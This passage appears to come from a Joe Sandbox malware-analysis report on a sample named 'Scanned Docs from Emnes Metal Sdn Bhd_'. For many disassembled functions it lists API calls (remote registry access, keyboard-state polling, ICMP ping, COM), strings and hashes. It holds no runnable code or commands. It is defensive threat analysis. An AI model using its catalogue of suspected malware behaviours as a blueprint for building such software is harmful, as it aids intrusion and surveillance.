                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 747408836-2268648507
                                                      • Opcode ID: a73fbb9c03c3cd292f95df2254ec3a90310b3dfc6c814ee6d3fcb90deddcb3f6
                                                      • Instruction ID: 9f53a899cd636ca8724f8a62cc4efd79095b9448df4fbcacaff752a4b7779c33
                                                      • Opcode Fuzzy Hash: a73fbb9c03c3cd292f95df2254ec3a90310b3dfc6c814ee6d3fcb90deddcb3f6
                                                      • Instruction Fuzzy Hash: FB416C76851209AADF05FFE1CD46DEEB378AF19700F540065F20172092EA256FA9CFA1
                                                      Function 002E06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002E07A2
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002E07BE
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002E07DA
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002E0804
                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 002E082C
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002E0837
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002E083C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 323675364-22481851
                                                      • Opcode ID: d1511a8058c7b5b10dd5621aeb0ba0232ad20dab37bae58afc8917df1acd0b61
                                                      • Instruction ID: 354caec66e8b8cc81bf462361233bd8b470556c5f0be04589a92e58ddcf4a707
                                                      • Opcode Fuzzy Hash: d1511a8058c7b5b10dd5621aeb0ba0232ad20dab37bae58afc8917df1acd0b61
                                                      • Instruction Fuzzy Hash: 52412876C21229ABDF11EFA4DC858EDB778BF08340F444169E901B31A1EB70AE55CFA0
                                                      Function 00303C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00303C5C
                                                      • CoInitialize.OLE32(00000000), ref: 00303C8A
                                                      • CoUninitialize.OLE32 ref: 00303C94
                                                      • _wcslen.LIBCMT ref: 00303D2D
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00303DB1
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00303ED5
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00303F0E
                                                      • CoGetObject.OLE32(?,00000000,0031FB98,?), ref: 00303F2D
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00303F40
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00303FC4
                                                      • VariantClear.OLEAUT32(?), ref: 00303FD8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                      • String ID:
                                                      • API String ID: 429561992-0
                                                      • Opcode ID: 7683cbffd62a4cd840a9e9bc809e05f9ea197e0b8601294649b2dfbe46bad1c8
                                                      • Instruction ID: baf9ccecc39bf3d04878ce45b74158638e03295b6b85487fccb1837024cddff6
                                                      • Opcode Fuzzy Hash: 7683cbffd62a4cd840a9e9bc809e05f9ea197e0b8601294649b2dfbe46bad1c8
                                                      • Instruction Fuzzy Hash: EEC13271609201AFD702DF68C89496BBBEDFF89744F00491DF98A9B291DB30EE45CB52
                                                      Function 002F7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 002F7AF3
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002F7B8F
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 002F7BA3
                                                      • CoCreateInstance.OLE32(0031FD08,00000000,00000001,00346E6C,?), ref: 002F7BEF
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002F7C74
                                                      • CoTaskMemFree.OLE32(?,?), ref: 002F7CCC
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 002F7D57
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002F7D7A
                                                      • CoTaskMemFree.OLE32(00000000), ref: 002F7D81
                                                      • CoTaskMemFree.OLE32(00000000), ref: 002F7DD6
                                                      • CoUninitialize.OLE32 ref: 002F7DDC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                      • String ID:
                                                      • API String ID: 2762341140-0
                                                      • Opcode ID: 911f9af2ba3654cbf38e2336a8c9009593ecf152fcfce71c823bf341352b08e9
                                                      • Instruction ID: 139a7eb352478c33dc5ff8d5399bec00d6a4c423c4354d23717f91b4fbe232ec
                                                      • Opcode Fuzzy Hash: 911f9af2ba3654cbf38e2336a8c9009593ecf152fcfce71c823bf341352b08e9
                                                      • Instruction Fuzzy Hash: ADC14B75A14109AFCB14DFA4C884DAEBBF9FF48344B1480A9E91ADB261DB30ED51CF90
                                                      Function 0031541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00315504
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00315515
                                                      • CharNextW.USER32(00000158), ref: 00315544
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00315585
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0031559B
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003155AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CharNext
                                                      • String ID:
                                                      • API String ID: 1350042424-0
                                                      • Opcode ID: 1dc0b9a8bea7c84b7008d0ce04b106cfcc270c4a8bf7d2ee36e467c9f6040be8
                                                      • Instruction ID: 3d8419580c73ae4f78648dd8ab63dc71a831192a0b4a0532f4eb2d1d87805189
                                                      • Opcode Fuzzy Hash: 1dc0b9a8bea7c84b7008d0ce04b106cfcc270c4a8bf7d2ee36e467c9f6040be8
                                                      • Instruction Fuzzy Hash: 8861AE30904608EFDF169F55CC84AFE7BBDEB8E321F148145F925AA290DB748AC0DB61
                                                      Function 002DFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002DFAAF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 002DFB08
                                                      • VariantInit.OLEAUT32(?), ref: 002DFB1A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 002DFB3A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 002DFB8D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 002DFBA1
                                                      • VariantClear.OLEAUT32(?), ref: 002DFBB6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 002DFBC3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002DFBCC
                                                      • VariantClear.OLEAUT32(?), ref: 002DFBDE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002DFBE9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 0ed9f2f5216744bee9ea3ed20195fea796aeda093c5e2aea37aa2e5cb5103226
                                                      • Instruction ID: d81d677f1470e77ae9a64632c6a180cca71ce4545428c34b1d5131eda68e09f3
                                                      • Opcode Fuzzy Hash: 0ed9f2f5216744bee9ea3ed20195fea796aeda093c5e2aea37aa2e5cb5103226
                                                      • Instruction Fuzzy Hash: 26417F35A10219AFDB01DFA4D8549EEBBB9FF08344F00806AE946A7361DB30AD55CFA4
                                                      Function 002E9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 002E9CA1
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 002E9D22
                                                      • GetKeyState.USER32(000000A0), ref: 002E9D3D
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 002E9D57
                                                      • GetKeyState.USER32(000000A1), ref: 002E9D6C
                                                      • GetAsyncKeyState.USER32(00000011), ref: 002E9D84
                                                      • GetKeyState.USER32(00000011), ref: 002E9D96
                                                      • GetAsyncKeyState.USER32(00000012), ref: 002E9DAE
                                                      • GetKeyState.USER32(00000012), ref: 002E9DC0
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 002E9DD8
                                                      • GetKeyState.USER32(0000005B), ref: 002E9DEA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 40b4e4bc018837df9799e3125f836a68afb73c41c454ab36ce58e244b4c69a35
                                                      • Instruction ID: 9507976639ddb9d7f41e04ba04aaaba0756ff67c02022bc85926a52183c54bd5
                                                      • Opcode Fuzzy Hash: 40b4e4bc018837df9799e3125f836a68afb73c41c454ab36ce58e244b4c69a35
                                                      • Instruction Fuzzy Hash: EB410B305A47CB6DFF31AF6688043F5BEE16F16304F88905BCAC6561C2D7A499E4C792
                                                      Function 0030055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 003005BC
                                                      • inet_addr.WSOCK32(?), ref: 0030061C
                                                      • gethostbyname.WSOCK32(?), ref: 00300628
                                                      • IcmpCreateFile.IPHLPAPI ref: 00300636
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003006C6
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003006E5
                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 003007B9
                                                      • WSACleanup.WSOCK32 ref: 003007BF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: a6d7381f1e889be0c465fe4bfaeb3052966178c96a87b221acb24b599e5b342e
                                                      • Instruction ID: fd21355193dd1ec134f424c956aefd5f40cd007965d2ca70c0f1fc2f12958f16
                                                      • Opcode Fuzzy Hash: a6d7381f1e889be0c465fe4bfaeb3052966178c96a87b221acb24b599e5b342e
                                                      • Instruction Fuzzy Hash: 7291BD34609201AFD326DF14C898F1ABBE4AF49318F1585A9E4698BAE2C734EC41CF91
                                                      Function 00308CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharLower
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 707087890-567219261
                                                      • Opcode ID: e3272d9f5377d812daa93d5ce5c8577190cd574e4af3299b72382edf1e8cd256
                                                      • Instruction ID: 8b6c3a5317d1f8326edc7274ca1bbf39323f652fdbed46c11829908ad21392f7
                                                      • Opcode Fuzzy Hash: e3272d9f5377d812daa93d5ce5c8577190cd574e4af3299b72382edf1e8cd256
                                                      • Instruction Fuzzy Hash: 9751D631A025169BCF15EF6CC9608BEB7A5BF65314B264229E495E72C0DF30ED40CB90
                                                      Function 0030372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32 ref: 00303774
                                                      • CoUninitialize.OLE32 ref: 0030377F
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,0031FB78,?), ref: 003037D9
                                                      • IIDFromString.OLE32(?,?), ref: 0030384C
                                                      • VariantInit.OLEAUT32(?), ref: 003038E4
                                                      • VariantClear.OLEAUT32(?), ref: 00303936
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 636576611-1287834457
                                                      • Opcode ID: 89b13ff8aca5c1422ea44d37c4364b40622472eea1560fb46a0fcdf1d0648a40
                                                      • Instruction ID: 8ad11e482d6f33a53b67ea6f6739f92b22d5696227334f004fd9341a1ff3922d
                                                      • Opcode Fuzzy Hash: 89b13ff8aca5c1422ea44d37c4364b40622472eea1560fb46a0fcdf1d0648a40
                                                      • Instruction Fuzzy Hash: AE61BF71609301AFD312DF54C898BAAB7ECEF49714F104849F9859B2D1C770EE48CB92
                                                      Function 002F3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002F33CF
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002F33F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-3080491070
                                                      • Opcode ID: bda9414a31c64824d3bf26a5ca0daedd5cad1495fa0ef08cf12aed57867c47fc
                                                      • Instruction ID: 8a69119c6096714e40f8f1c30bc64ff6c9145a3488f7aa412bf916e55bb47fa7
                                                      • Opcode Fuzzy Hash: bda9414a31c64824d3bf26a5ca0daedd5cad1495fa0ef08cf12aed57867c47fc
                                                      • Instruction Fuzzy Hash: 7651917591120AAADF15FBA0CD56EFEB378AF08740F144065F505720A2EB356FA8CF61
                                                      Function 002EB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 1256254125-769500911
                                                      • Opcode ID: 4fc57eef2202a555f1b6bf3c6dcc4a8b619fcf73c0a1967bf6b477e60744d83c
                                                      • Instruction ID: c311559caa3ae1238d35f605407d5a137ca6032a608ae8228b4f757cc518a497
                                                      • Opcode Fuzzy Hash: 4fc57eef2202a555f1b6bf3c6dcc4a8b619fcf73c0a1967bf6b477e60744d83c
                                                      • Instruction Fuzzy Hash: AE41FB32A600679BCB216F7FC8905BFB7A9BFA1754B644129E421DB284E731CDA1C790
                                                      Function 002F5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 002F53A0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002F5416
                                                      • GetLastError.KERNEL32 ref: 002F5420
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 002F54A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: f9f9159185434334e6f06b5bf30549bca65ebaea5777004f9879b77c7b266d08
                                                      • Instruction ID: e82d80747845f90c3f7f27b6bcadec1f06f5194aea2cfebc91deb4f818dd1c66
                                                      • Opcode Fuzzy Hash: f9f9159185434334e6f06b5bf30549bca65ebaea5777004f9879b77c7b266d08
                                                      • Instruction Fuzzy Hash: 1C31B139A206199FC711DF68C485AB9FBF8EB05345F148069E601CB292D770ED92CBA1
                                                      Function 00313C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateMenu.USER32 ref: 00313C79
                                                      • SetMenu.USER32(?,00000000), ref: 00313C88
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00313D10
                                                      • IsMenu.USER32(?), ref: 00313D24
                                                      • CreatePopupMenu.USER32 ref: 00313D2E
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00313D5B
                                                      • DrawMenuBar.USER32 ref: 00313D63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                      • String ID: 0$F
                                                      • API String ID: 161812096-3044882817
                                                      • Opcode ID: 394d455ba5ba2d855731bd6c5bbd8975c5a09a19d059a8b75824d6241362bd91
                                                      • Instruction ID: b2a3168b1d139d48f89ed9f1a863d8cc56542e0d3de86efaf4231c9c9bddbc43
                                                      • Opcode Fuzzy Hash: 394d455ba5ba2d855731bd6c5bbd8975c5a09a19d059a8b75824d6241362bd91
                                                      • Instruction Fuzzy Hash: 2B418A78A01209EFDB19CF64E844AEA7BBAFF4D304F144028E90697360D730AA10CF94
                                                      Function 00313A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00313A9D
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00313AA0
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00313AC7
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00313AEA
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00313B62
                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00313BAC
                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00313BC7
                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00313BE2
                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00313BF6
                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00313C13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
